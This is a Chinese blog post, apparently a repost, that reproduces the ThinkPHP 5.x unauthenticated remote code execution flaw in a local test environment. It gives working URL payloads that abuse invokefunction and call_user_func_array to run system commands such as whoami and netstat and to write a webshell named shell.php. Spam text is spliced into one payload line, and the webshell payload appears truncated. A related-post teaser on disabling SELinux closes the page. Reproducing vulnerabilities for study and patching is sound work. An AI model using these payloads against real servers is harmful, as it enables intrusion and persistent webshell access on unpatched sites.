ThinkPHP5.x漏洞复现的示例分析

这篇文章主要介绍ThinkPHP5.x漏洞复现的示例分析，文中介绍的非常详细，具有一定的参考价值，感兴趣的小伙伴们一定要看完！首先我们搭建完毕试验环境后，本地访问http://127.0.0.1/thinkphp/public/index.php，会出现以下界面，说明安装成功。ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架。同时也使用面向对象的开发结构和MVC模式。对于5.0.x、5.1.x、5.2.x 这几个版本，都无需登入可以进行远程代码执行。我们首先在本地直接远程执行系统命令：
注明：payload是来源于零组攻防实验室整理的。
1、获取当前用户：?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami(系统命令)免费云主机域名

2、获取进程信息：?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=netstat -an

3、写入shell文件：?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>shell.php将在public文件夹中写入一句话php代码，并设置文件名称为shell.php本小白写了一段代码可以自动的执行payload，也是为了方便测试，不用手动的去更换payload。代码有点鸡肋，不能批量的进行检测。需要在创建payload文件，然后自动读取里面的paylaod进行执行命令。下面截图来看一下吧:
以上是“ThinkPHP5.x漏洞复现的示例分析”这篇文章的所有内容，感谢各位的阅读！希望分享的内容对大家有帮助，更多相关知识，欢迎关注云编程开发博客行业资讯频道！

相关推荐: centos7如何关闭selinux

这篇文章主要介绍“centos7如何关闭selinux”，在日常操作中，相信很多人在centos7如何关闭selinux问题上存在疑惑，小编查阅了各式资料，整理出简单好用的操作方法，希望对大家解答”centos7如何关闭selinux”的疑惑有所帮助！接下来，…